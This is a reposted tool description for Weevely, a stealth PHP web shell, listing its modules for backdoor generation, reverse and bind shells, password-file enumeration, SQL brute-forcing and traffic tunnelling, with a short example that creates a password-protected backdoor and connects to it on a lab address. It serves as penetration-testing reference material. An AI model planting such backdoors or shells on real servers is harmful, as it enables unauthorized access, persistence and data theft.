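Weevely Package Description
Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free hosted ones. Source: https://github.com/epinna/Weevely/
- Author: Weevely Developers
- License: GPLv2
0x01 Tools included in the weevely package
weevely - Stealth tiny web shell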
:~# weevely help
+--------------------+------------------------------------------------------+
| generator          | description                                          |
+--------------------+------------------------------------------------------+
| :generate.img      | Backdoor existing image and create related .htaccess |
| :generate.htaccess | Generate backdoored .htaccess                        |
| :generate.php      | Generate obfuscated PHP backdoor                     |
+--------------------+------------------------------------------------------+

+----------------------+------------------------------------------------------------------------------+
| module               | description                                                                  |
+----------------------+------------------------------------------------------------------------------+
| :audit.systemfiles   | Find wrong system files permissions                                          |
| :audit.userfiles     | Guess files with wrong permissions in users home folders                     |
| :audit.mapwebfiles   | Crawl and enumerate web folders files permissions                            |
| :audit.phpconf       | Check php security configurations                                            |
| :audit.etcpasswd     | Enumerate users and /etc/passwd content                                      |
| :shell.sh            | Execute system shell command                                                 |
| :shell.php           | Execute PHP statement                                                        |
| :system.info         | Collect system informations                                                  |
| :find.name           | Find files with matching name                                                |
| :find.perms          | Find files with write, read, execute permissions                             |
| :find.suidsgid       | Find files with superuser flags                                              |
| :backdoor.reversetcp | Send reverse TCP shell                                                       |
| :backdoor.tcp        | Open a shell on TCP port                                                     |
| :bruteforce.sql      | Bruteforce SQL username                                                      |
| :bruteforce.sqlusers | Bruteforce all SQL users                                                     |
| :file.read           | Read remote file                                                             |
| :file.webdownload    | Download web URL to remote filesystem                                        |
| :file.mount          | Mount remote filesystem using HTTPfs                                         |
| :file.enum           | Enumerate remote paths                                                       |
| :file.upload2web     | Upload binary/ascii file into remote web folders and guess corresponding url |
| :file.check          | Check remote files type, md5 and permission                                  |
| :file.rm             | Remove remote files and folders                                              |
| :file.ls             | List directory contents                                                      |
| :file.touch          | Change file timestamps                                                       |
| :file.download       | Download binary/ascii files from the remote filesystem                       |
| :file.upload         | Upload binary/ascii file into remote filesystem                              |
| :file.edit           | Edit remote file                                                             |
| :sql.console         | Run SQL console or execute single queries                                    |
| :sql.dump            | Get SQL database dump                                                        |
| :net.ifaces          | Print interfaces addresses                                                   |
| :net.proxy           | Install and run Proxy to tunnel traffic through target                       |
| :net.phpproxy        | Install remote PHP proxy                                                     |
| :net.scan            | Port scan open TCP ports                                                     |
+----------------------+------------------------------------------------------------------------------+

Hint: Run ':help <module>' to print detailed usage informations.
0x02 weevely Usage Example
Generate a PHP backdoor (generate) protected with the given password (s3cr3t).
:~# weevely generate s3cr3t
[generate.php] Backdoor file 'weevely.php' created with password 's3cr3t'

:~# weevely http://192.168.1.202/weevely.php s3cr3t
      ________                     __
     |  |  |  |----.----.-.--.----'  |--.--.
     |  |  |  | -__| -__| |  | -__|  |  |  |
     |________|____|____|___/|____|__|___  | v1.1
                                     |_____|
              Stealth tiny web shell

[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/192.168.1.202/weevely.session'

:/var/www $ uname
Linux
:/var/www $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
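Original article: https://www.hackfun.org/kali-tools/weevely_zh.html. Please credit the original source when reposting; for commercial use, contact the original author for authorization.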